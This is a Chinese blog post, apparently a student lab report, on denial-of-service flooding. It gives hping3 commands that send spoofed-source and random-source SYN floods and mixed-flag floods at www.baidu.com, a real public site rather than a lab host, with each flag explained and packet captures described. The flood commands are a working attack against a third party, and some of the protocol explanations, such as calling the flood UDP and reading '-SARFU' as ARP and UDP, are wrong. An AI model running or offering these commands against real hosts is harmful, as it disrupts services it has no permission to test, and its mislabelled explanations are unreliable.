实验四 拒绝服务攻击

本文通过kali系统使用hping3工具进行了UDPFlood攻击的实战演练,包括SYN数据包伪造、随机源IP发送大量数据包以及混合协议攻击。实验展示了如何成功伪造IP并耗尽网络资源,揭示了拒绝服务攻击的原理,特别是UDP无连接特性在DDoS攻击中的应用。
摘要由CSDN通过智能技术生成

实验目的

UDP Flood攻击练习

实验内容

实验环境:kali IP:192.168.91.129

1.hping3

1.1 hping3 -S -a 1.1.1.1 -V www.baidu.com #发送SYN数据包,伪造IP来源为1.1.1.1

-a 为伪造IP地址来源
-V冗余模式
-S 发送SYN数据包
–flood 只发数据包,不考虑数据入站回显
启动wireshark抓包查看伪造的IP 1.1.1.1是否生效
抓包
在这里插入图片描述
在这里插入图片描述
通过对数据分析可以看到成功的伪造了数据包的来源,并且在不断的向外发送数据包。

1.2 hping3 -S -V –flood –rand-source -c 10000 -d 150 -w 64 -p 80 www.baidu.com
-c 10000 发送数据包数量
-d 150 发送的每个数据包的大小
-w 64 TCP窗口的大小
-p 80 攻击目的端口
–ran-source 使用随记性源IP地址

在这里插入图片描述
抓包
在这里插入图片描述
可以看到伪造的IP地址发送的数据包的数量
在这里插入图片描述
1.3 hping3 -SARFU -V –flood –rand-source -c 10000 -d 150 -w 64 -p 80 www.baidu.com
-SARFU 发送SYN、ARP、UDP等不同协议的数据包
在这里插入图片描述
抓包
在这里插入图片描述

实验结论

拒绝服务攻击即攻击者想办法让目标机器停止提供服务。常见为消耗宽带、CPU、内存资源(各种洪水攻击)。导致延长服务器响应时间。利用服务漏洞,攻陷服务。IP欺骗等。
UDP Flooding攻击: UDP是一个无连接的传输层协议,所以在数据传输过程,不需要建立连接和进行认证。攻击者只需要向目标发送大量巨大的UDP数据包,就会使目标所在的网络资源被耗尽。
攻击者使用源IP欺骗的方法向有漏洞的UDP服务器发送伪造请求。UDP服务器不知道请求是伪造的,就会响应。当成干上万的响应被传递给一个不知情的目标主机时,这个攻击问题就会发生。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值